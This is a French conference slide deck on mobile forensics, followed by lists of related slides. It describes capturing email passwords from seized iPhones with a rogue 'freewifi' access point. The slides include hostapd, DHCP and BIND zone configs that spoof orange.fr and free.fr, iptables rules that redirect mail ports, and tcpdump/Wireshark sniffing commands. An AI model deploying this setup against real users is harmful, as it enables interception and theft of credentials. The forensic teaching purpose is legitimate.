SlideShare a Scribd company logo
1 of 52
boolaz.com
Uriel Expert - 1 avenue Henri Dunant 98000 Monaco
Extraction de mots de passe depuis un smartphone
par attaque de type man-in-the-middle
Bruno Valentin
Problématique
2
boolaz.com
Problématique
• Saisie d'une dizaine de périphériques fonctionnant sous iOS dans le cadre
d’un dossier judiciaire

• Nécessité de déterminer les propriétaires des périphériques ainsi que les
comptes de courrier électroniques configurés dans chacun d'eux

> gmail (SSL), orange, free
3
boolaz.com
Control center
• Certains périphériques sont verrouillés par un code

> mis en mode avion par le control center (habituellement activé)
4
boolaz.com
Extraction des mots de passe
• non gérée par les logiciels spécialisés

> xry, cellebrite UFED, MPE+, oxygen, mobiledit, lantern, elcomsoft
5
boolaz.com
Ordre de wipe lancé depuis iCloud
6
Approche adoptée
7
boolaz.com
Approche adoptée
• Mise en place d’un point d’accès virtuel

> détournement / interception des données

• Attaque man-in-the-middle

• Utilisation d’un SSID courant

> freewifi par exemple

• Inviter les smartphones à se reconnecter sur 

un SSID connu (smartphones verrouillés)

• technique du pot de miel
8
boolaz.com
Solution matérielle disponible : Pineapple
• 2x WiFi cards (Atheros 9331 & RTL8187)

• Emplacement micro-SD pour le stockage 

• packages disponibles : aircrack-ng, dsniff, easy-creds, ettercap, hping3,
httptunnel, karma, kismet, macchanger, mdk3, ngrep, nmap, nodogsplash
captive portal, privoxy, ptunnel, snort, sslsniff, sslstrip, ssltunnel, stunnel,
tcpdump, tor, and reaver
9
boolaz.com
Pineapple
10
boolaz.com
Inconvénients
• 150$

• manque de flexibilité de la configuration logicielle 

• reconfiguration pour chaque SSID

• nécessité de contrôler les données qui pourraient sortir ou entrer

> connexion sur les serveurs d'Apple et réinitialisation des smartphones

> récupération des courriers électroniques en attente dans les BAL

> problèmes juridiques
11
boolaz.com
Approche adoptée
• Les périphériques doivent être sortis du mode avion

mais mais ne doivent pas avoir accès à Internet

> réinitialisation immédiate

• Nécessité de mettre en place une infrastructure cloisonnée pour émuler, en
local, les serveurs de courrier électronique des fournisseurs

> Cage de Faraday logicielle
> But : Laisser penser aux périphériques 

qu’ils peuvent atteindre les serveurs 

internet de leurs opérateurs pour qu’ils 

présentent leurs identifiants / mots de passe
12
boolaz.com
Logiciels et matériels utilisés
• Moteur de virtualisation

> VMWare fusion

• Distribution linux

> Xubuntu 12.04

> Backtrack ou Kali

> ou autre

• Dongle USB

> Dlink DWL-G122
13
boolaz.com
Infrastructure
14
freewifi
iCloud.com ?
icloud =

192.168.66.1
192.168.66.1
Pas de wipe
pop.orange.fr ?
pop.orange.fr

192.168.66.1
pop.orange.fr port 110

user : toto@orange.fr
pass : MySuperPass
boolaz.com
U
R

I

E

L
Configuration du
point d’accès virtuel
15
boolaz.com
Système Linux
• Cloisonnement total

• Interface réseau déconnectée dans la VM

• système autonome

> interception de toutes les requêtes DNS et réponse inconditionnelle

> Différents services émulés localement

• S'assurer du cloisonnement avant d'y connecter le smartphone

• S'assurer de l'absence dans l'environnement de 

SSID connus/OPN que le smartphone pourrait accrocher
16
boolaz.com
Services Linux : 4 briques
• HOSTAPD

> IEEE 802.11

• DHCPD

> Attribution automatique IP

• BIND

> Serveur DNS

• POSTFIX + POP/IMAP + SASL

> Emulation des serveurs de courrier
17
HOSTAPD
DHCPD
BIND
POSTFIX
boolaz.com
HOSTAPD
• apt-get install hostapd

• /etc/hostapd/hostapd.conf

interface=wlan0
channel=6
driver=nl80211
ssid=freewifi
auth_algs=1
hw_mode=g
max_num_sta=1
macaddr_acl=0
ignore_broadcast_ssid=0
• récupération possible des probe requests (mode actif)
18
boolaz.com
19
SSID courants
boolaz.com
DHCPD
• apt-get install dhcp3-server

• /etc/dhcp/dhcpd.conf

ddns-update-style none;
option domain-name-servers ns1.freewifi.fr;
default-lease-time 600;
max-lease-time 7200;
log-facility local7;
subnet 192.168.66.0 netmask 255.255.255.0 {
range 192.168.66.25 192.168.66.50;
option domain-name-servers 192.168.66.1;
option routers 192.168.66.1;
}
20
boolaz.com
Zones DNS gérées par le Bind local
zone "freewifi.fr" {
type master;
file "/etc/bind/freewifi.fr";
};
 
zone "orange.fr" {
type master;
file "/etc/bind/orange.fr";
};
zone "free.fr" {
type master;
file "/etc/bind/free.fr";
};
21
boolaz.com
Zone DNS orange.fr
$ORIGIN orange.fr.
$TTL 60 ; validite des reponses
@ IN SOA ns1.freewifi.fr. root.freewifi.fr. (
2002121136 ; sn
8h ; refresh slave (mise à jour slave)
15m ; update retry (slave re-essaye)
1w ; expiry (slave arrete apres)
3h ) ; minimum (plus utilisee)
 
@ IN NS ns1.freewifi.fr.
 
@ IN A 192.168.66.1
www IN A 192.168.66.1
pop IN CNAME www
imap IN CNAME www
smtp IN CNAME www
22
boolaz.com
23
boolaz.com
SMTP Postfix
• /etc/postfix/main.cf

myhostname = jailsrv
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = smtp.orange.fr smtp.free.fr jailsrv localhost
relayhost =
mynetworks = 127.0.0.0/8 192.168.66.1/24
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
smtpd_sasl_auth_enable = yes
24
boolaz.com
Authentification SASL
• "Simple Authentication and Security Layer"

• But : Gérer l'authentification SMTP pour permettre aux utilisateurs de
s'identifier et récupérer leurs identifiants d'envoi

• /etc/default/saslauthd

START=yes
DESC="SASL Authentication Daemon"
NAME="saslauthd"

MECHANISMS="pam"

MECH_OPTIONS=""

THREADS=5
OPTIONS="-c -m /var/run/saslauthd"
25
boolaz.com
26
Notre pot de miel est prêt 👌
boolaz.com
U
R

I

E

L
Activation du wifi
Désactivation du mode hors ligne
sur les smartphones
27
boolaz.com
Appairage des périphériques WIFI
28
boolaz.com
Serveur DHCP
29
boolaz.com
Evidemment : pas de portail captif
30
boolaz.com
Requêtes DNS
31
boolaz.com
Interception des flux
32
boolaz.com
Interception des flux pop, imap et smtp
• Si le DNS n'est pas détourné en totalité, il est important d'intercepter tous les
flux susceptibles de révéler les mots de passe

• Le point d’accès intercepte les flux pertinents et les redirige sur le serveur
local

> SMTP : 25, 587

> POP : 110

> IMAP : 143

• Cette redirection transparente des flux se fait par l’utilisation de règles de
firewall iptables

iptables -t nat -A PREROUTING -p tcp --dport 110 -j DNAT --to-destination 192.168.66.1
iptables -t nat -A PREROUTING -p tcp --dport 143 -j DNAT --to-destination 192.168.66.1
iptables -t nat -A PREROUTING -p tcp --dport 25 -j DNAT --to-destination 192.168.66.1
iptables -t nat -A PREROUTING -p tcp --dport 587 -j DNAT --to-destination 192.168.66.1
33
boolaz.com
Récupération des mots de passe
34
boolaz.com
Sniffing sélectif
• La récupération des mots de passe peut être effectuée par un sniffing sélectif
sur des ports 

> 110, 143 : POP, IMAP

> 25, 587 : SMTP

• Interception du flux réseau

> TCPdump

tcpdump -vv -x -X -s 1500 -i wlan 0 

'port 110 or port 143 or port 25 or port 587'
> Wireshark

wireshark -i wlan0 -p -k -f 

"port 110 or port 143 or port 25 or port 587"
35
boolaz.com
TCPDump
36
boolaz.com
Wireshark
37
Follow TCP Stream
boolaz.com
SMTP Auth
• Enregistrement de l'authentification SMTP / SASL

• Sortie TCPDUMP

• Pour l’authentification SMTP, les informations recueillies sont en base64
38
boolaz.com
Problématique du SSL
39
boolaz.com
GMail
• la messagerie de google utilise par défaut le SSL pour la connexion

• Même en détournant le flux vers la machine virtuelle, il est impossible
d'extraire le mot de passe, celui-ci étant chiffré

• Il est nécessaire de désactiver le SSL pour la connexion GMAIL.

• Il en est de même pour les autres messageries

sécurisées

• Cela signifie donc qu'il faut déverrouiller

l'iphone pour pouvoir changer ce paramètre
40
boolaz.com
41
boolaz.com
IMAPs
42
boolaz.com
SMTP over SSL
43
boolaz.com
44
boolaz.com
Filtres wireshark
• Il est possible de filtrer les packets plus finement via l'utilisation de filtres
d'affichage dans Wireshark
45
boolaz.com
iCloud
• cf : site web apple.com

• chiffrement AES minimal de 128 bits

• chiffrement impossible à désactiver sur iCloud

> pas d'option pour le faire dans l'iphone, 

même s'il est déverrouillé
46
boolaz.com
U
R

I

E

L
Aller un peu plus loin
47
boolaz.com
Requêtes DNS : des informations pleines de sens
48
boolaz.com
Aller plus loin
• Reconfiguration automatique du SSID par script

> Brute force sur le SSID

• Emulation d'un serveur HTTP / HTTPS 

• redirection inconditionnelle de toutes les requêtes web des smartphones sur
le serveur web local installé sur la machine

• Récupération des requêtes GET et POST
49
boolaz.com
50
boolaz.com
51
boolaz.com
Uriel Expert - 1 avenue Henri Dunant 98000 Monaco
Merci de votre attention




	 	 

	 

	 	 	 bvalentin@uriel-expert.com

	 	 	 www.uriel-expert.com

More Related Content

What's hot

Comment votre pc peut il être piraté sur internet
Comment votre pc peut il être piraté sur internetComment votre pc peut il être piraté sur internet
Comment votre pc peut il être piraté sur internetAyoub Ouchlif
 
Mécanismes de sécurité
Mécanismes de sécuritéMécanismes de sécurité
Mécanismes de sécuritéGhazouani Mahdi
 
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...usthbsido
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques InformatiquesSylvain Maret
 
Comment se protéger de locky et petya
Comment se protéger de locky et petyaComment se protéger de locky et petya
Comment se protéger de locky et petyaKiwi Backup
 
Linux sécurité informatique cours Jean-Antoine Moreau
Linux sécurité informatique cours Jean-Antoine MoreauLinux sécurité informatique cours Jean-Antoine Moreau
Linux sécurité informatique cours Jean-Antoine MoreauJean-Antoine Moreau
 
Scénarios d'exploitation Metasploit - FR : Scénario 3
Scénarios d'exploitation Metasploit - FR : Scénario 3Scénarios d'exploitation Metasploit - FR : Scénario 3
Scénarios d'exploitation Metasploit - FR : Scénario 3Eric Romang
 
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...DICKO Yacouba
 
Mise en place du Firewall IPCop
Mise en place du Firewall IPCopMise en place du Firewall IPCop
Mise en place du Firewall IPCopMohammed Zaoui
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeMarie Tapia
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Eric Romang
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatiqueSaber Ferjani
 
Introduction à la sécurité informatique
Introduction à la sécurité informatiqueIntroduction à la sécurité informatique
Introduction à la sécurité informatiqueYves Van Gheem
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderMohamed Ben Bouzid
 
Présentation gnireenigne
Présentation   gnireenignePrésentation   gnireenigne
Présentation gnireenigneCocoaHeads.fr
 
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...guest0b40ec
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcampCameroon
 

What's hot (20)

Comment votre pc peut il être piraté sur internet
Comment votre pc peut il être piraté sur internetComment votre pc peut il être piraté sur internet
Comment votre pc peut il être piraté sur internet
 
Mécanismes de sécurité
Mécanismes de sécuritéMécanismes de sécurité
Mécanismes de sécurité
 
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques Informatiques
 
Comment se protéger de locky et petya
Comment se protéger de locky et petyaComment se protéger de locky et petya
Comment se protéger de locky et petya
 
Hackernew
HackernewHackernew
Hackernew
 
La culture hacker
La culture hackerLa culture hacker
La culture hacker
 
Linux sécurité informatique cours Jean-Antoine Moreau
Linux sécurité informatique cours Jean-Antoine MoreauLinux sécurité informatique cours Jean-Antoine Moreau
Linux sécurité informatique cours Jean-Antoine Moreau
 
Scénarios d'exploitation Metasploit - FR : Scénario 3
Scénarios d'exploitation Metasploit - FR : Scénario 3Scénarios d'exploitation Metasploit - FR : Scénario 3
Scénarios d'exploitation Metasploit - FR : Scénario 3
 
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...
Guide de piratage d'un reseau wifi domestiquee (ou commentexploserune clef we...
 
Mise en place du Firewall IPCop
Mise en place du Firewall IPCopMise en place du Firewall IPCop
Mise en place du Firewall IPCop
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme Thémée
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
 
Sécuriter informatiques
Sécuriter informatiquesSécuriter informatiques
Sécuriter informatiques
 
Introduction à la sécurité informatique
Introduction à la sécurité informatiqueIntroduction à la sécurité informatique
Introduction à la sécurité informatique
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey Spider
 
Présentation gnireenigne
Présentation   gnireenignePrésentation   gnireenigne
Présentation gnireenigne
 
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...
Guide De Piratage Dun Reseau Wifi Domestique (Ou Commentexploserune Clef Wep)...
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphia
 

Viewers also liked

Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Bruno Valentin
 
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...Clive Aldred
 
Spring Par La Pratique
Spring Par La PratiqueSpring Par La Pratique
Spring Par La Pratiquesalmenloukil
 
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionSylvain Maret
 
Installation configuration openvas
Installation configuration openvasInstallation configuration openvas
Installation configuration openvasSafae Rahel
 
Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cuiIdir Gaci
 
Ca hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehackingCa hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehacking81787
 
Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationmichelcusin
 
Présentation finale pi soutenance
Présentation finale pi soutenancePrésentation finale pi soutenance
Présentation finale pi soutenanceTristan De Candé
 
Ligne de commandes sous Linux : effrayant ? Non : indispensable !
Ligne de commandes sous Linux : effrayant ? Non : indispensable !Ligne de commandes sous Linux : effrayant ? Non : indispensable !
Ligne de commandes sous Linux : effrayant ? Non : indispensable !Pascal MARTIN
 
La sécurité informatique en belgique dec 2013 - 2
La sécurité informatique en belgique   dec 2013 - 2La sécurité informatique en belgique   dec 2013 - 2
La sécurité informatique en belgique dec 2013 - 2Rudi Réz
 
La sécurité informatique en belgique avril 2014
La sécurité informatique en belgique   avril 2014La sécurité informatique en belgique   avril 2014
La sécurité informatique en belgique avril 2014Rudi Réz
 
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014Sébastien GIORIA
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
Cours CyberSécurité - CyberGuerre & CyberTerrorisme
Cours CyberSécurité - CyberGuerre & CyberTerrorismeCours CyberSécurité - CyberGuerre & CyberTerrorisme
Cours CyberSécurité - CyberGuerre & CyberTerrorismeFranck Franchin
 
Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Sylvain Maret
 

Viewers also liked (20)

Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)
 
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...
Talking Telephone Numbers - A History of Telephone Fraud - Modem Dialler Frau...
 
Spring Par La Pratique
Spring Par La PratiqueSpring Par La Pratique
Spring Par La Pratique
 
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
 
ASFWS 2013 - Welcome
ASFWS 2013 - Welcome ASFWS 2013 - Welcome
ASFWS 2013 - Welcome
 
Installation configuration openvas
Installation configuration openvasInstallation configuration openvas
Installation configuration openvas
 
Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cui
 
Ca hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehackingCa hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehacking
 
Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'information
 
Coursinfo s4
Coursinfo s4Coursinfo s4
Coursinfo s4
 
Présentation finale pi soutenance
Présentation finale pi soutenancePrésentation finale pi soutenance
Présentation finale pi soutenance
 
Ligne de commandes sous Linux : effrayant ? Non : indispensable !
Ligne de commandes sous Linux : effrayant ? Non : indispensable !Ligne de commandes sous Linux : effrayant ? Non : indispensable !
Ligne de commandes sous Linux : effrayant ? Non : indispensable !
 
La sécurité informatique en belgique dec 2013 - 2
La sécurité informatique en belgique   dec 2013 - 2La sécurité informatique en belgique   dec 2013 - 2
La sécurité informatique en belgique dec 2013 - 2
 
La sécurité informatique en belgique avril 2014
La sécurité informatique en belgique   avril 2014La sécurité informatique en belgique   avril 2014
La sécurité informatique en belgique avril 2014
 
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
cours Lunix
cours Lunixcours Lunix
cours Lunix
 
Cours CyberSécurité - CyberGuerre & CyberTerrorisme
Cours CyberSécurité - CyberGuerre & CyberTerrorismeCours CyberSécurité - CyberGuerre & CyberTerrorisme
Cours CyberSécurité - CyberGuerre & CyberTerrorisme
 
Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2
 

Similar to Extraction mots de passe par attaque Man-in-the-middle

Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirLionelTopotam
 
chap 4 Sécurité des accès.pdf
chap 4 Sécurité des accès.pdfchap 4 Sécurité des accès.pdf
chap 4 Sécurité des accès.pdfdepinfo
 
SSH - Secure Shell
SSH - Secure ShellSSH - Secure Shell
SSH - Secure ShellSouhaib El
 
0240-formation-ssh-secure-shell.pdf
0240-formation-ssh-secure-shell.pdf0240-formation-ssh-secure-shell.pdf
0240-formation-ssh-secure-shell.pdfBellaj Badr
 
Ssl et certification electronique - (construction de certification)
Ssl et certification electronique  - (construction de certification)Ssl et certification electronique  - (construction de certification)
Ssl et certification electronique - (construction de certification)achraf_ing
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...☁️Seyfallah Tagrerout☁ [MVP]
 
Contourner un Hotspot Mikrotik - IP Binding
Contourner un Hotspot Mikrotik - IP BindingContourner un Hotspot Mikrotik - IP Binding
Contourner un Hotspot Mikrotik - IP BindingAlex Assi
 
Configuration routeurs.pptx
Configuration routeurs.pptxConfiguration routeurs.pptx
Configuration routeurs.pptxZinaAknouche1
 
Serveur sms avec traitement de contenu, avec Gammu
Serveur sms avec traitement de contenu, avec GammuServeur sms avec traitement de contenu, avec Gammu
Serveur sms avec traitement de contenu, avec GammuFabrice Sonzahi
 
Sécurité asterisk web
Sécurité asterisk webSécurité asterisk web
Sécurité asterisk webAgarik
 
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)Hackfest Communication
 
2018 06 Demo Checkpoint et Splunk e-Xpert solutions
2018 06 Demo Checkpoint et Splunk e-Xpert solutions2018 06 Demo Checkpoint et Splunk e-Xpert solutions
2018 06 Demo Checkpoint et Splunk e-Xpert solutionse-Xpert Solutions SA
 
Le PowerShell et la ModernAuth
Le PowerShell et la ModernAuthLe PowerShell et la ModernAuth
Le PowerShell et la ModernAuthClément SERAFIN
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfMoufidaHajjaj
 
08 03 sécurisation d'un serveur web avec ssl
08 03 sécurisation d'un serveur web avec ssl08 03 sécurisation d'un serveur web avec ssl
08 03 sécurisation d'un serveur web avec sslNoël
 

Similar to Extraction mots de passe par attaque Man-in-the-middle (20)

Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossir
 
securite.ppt
securite.pptsecurite.ppt
securite.ppt
 
Réseau MiNET
Réseau MiNETRéseau MiNET
Réseau MiNET
 
chap 4 Sécurité des accès.pdf
chap 4 Sécurité des accès.pdfchap 4 Sécurité des accès.pdf
chap 4 Sécurité des accès.pdf
 
SSH - Secure Shell
SSH - Secure ShellSSH - Secure Shell
SSH - Secure Shell
 
0240-formation-ssh-secure-shell.pdf
0240-formation-ssh-secure-shell.pdf0240-formation-ssh-secure-shell.pdf
0240-formation-ssh-secure-shell.pdf
 
BSidesQuebec2013-ssl
BSidesQuebec2013-sslBSidesQuebec2013-ssl
BSidesQuebec2013-ssl
 
Ssl et certification electronique - (construction de certification)
Ssl et certification electronique  - (construction de certification)Ssl et certification electronique  - (construction de certification)
Ssl et certification electronique - (construction de certification)
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
 
Compte rendu
Compte renduCompte rendu
Compte rendu
 
Contourner un Hotspot Mikrotik - IP Binding
Contourner un Hotspot Mikrotik - IP BindingContourner un Hotspot Mikrotik - IP Binding
Contourner un Hotspot Mikrotik - IP Binding
 
Configuration routeurs.pptx
Configuration routeurs.pptxConfiguration routeurs.pptx
Configuration routeurs.pptx
 
Serveur sms avec traitement de contenu, avec Gammu
Serveur sms avec traitement de contenu, avec GammuServeur sms avec traitement de contenu, avec Gammu
Serveur sms avec traitement de contenu, avec Gammu
 
Sécurité asterisk web
Sécurité asterisk webSécurité asterisk web
Sécurité asterisk web
 
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
802.1X filaire, un monde idéal illusoire? (Olivier Bilodeau)
 
2018 06 Demo Checkpoint et Splunk e-Xpert solutions
2018 06 Demo Checkpoint et Splunk e-Xpert solutions2018 06 Demo Checkpoint et Splunk e-Xpert solutions
2018 06 Demo Checkpoint et Splunk e-Xpert solutions
 
Les sockets.pptx
Les sockets.pptxLes sockets.pptx
Les sockets.pptx
 
Le PowerShell et la ModernAuth
Le PowerShell et la ModernAuthLe PowerShell et la ModernAuth
Le PowerShell et la ModernAuth
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdf
 
08 03 sécurisation d'un serveur web avec ssl
08 03 sécurisation d'un serveur web avec ssl08 03 sécurisation d'un serveur web avec ssl
08 03 sécurisation d'un serveur web avec ssl
 

Recently uploaded

GAL2024 - Méthane 2030 : une démarche collective française à destination de t...
GAL2024 - Méthane 2030 : une démarche collective française à destination de t...GAL2024 - Méthane 2030 : une démarche collective française à destination de t...
GAL2024 - Méthane 2030 : une démarche collective française à destination de t...Institut de l'Elevage - Idele
 
comprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestioncomprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestionyakinekaidouchi1
 
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusGAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusInstitut de l'Elevage - Idele
 
Câblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfCâblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfmia884611
 
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfWBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfSophie569778
 
conception d'un batiment r+4 comparative de defferente ariante de plancher
conception d'un  batiment  r+4 comparative de defferente ariante de plancherconception d'un  batiment  r+4 comparative de defferente ariante de plancher
conception d'un batiment r+4 comparative de defferente ariante de planchermansouriahlam
 
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...Institut de l'Elevage - Idele
 
Algo II : les piles ( cours + exercices)
Algo II :  les piles ( cours + exercices)Algo II :  les piles ( cours + exercices)
Algo II : les piles ( cours + exercices)Sana REFAI
 
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...Institut de l'Elevage - Idele
 
GAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesGAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesInstitut de l'Elevage - Idele
 
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfJTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfInstitut de l'Elevage - Idele
 
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
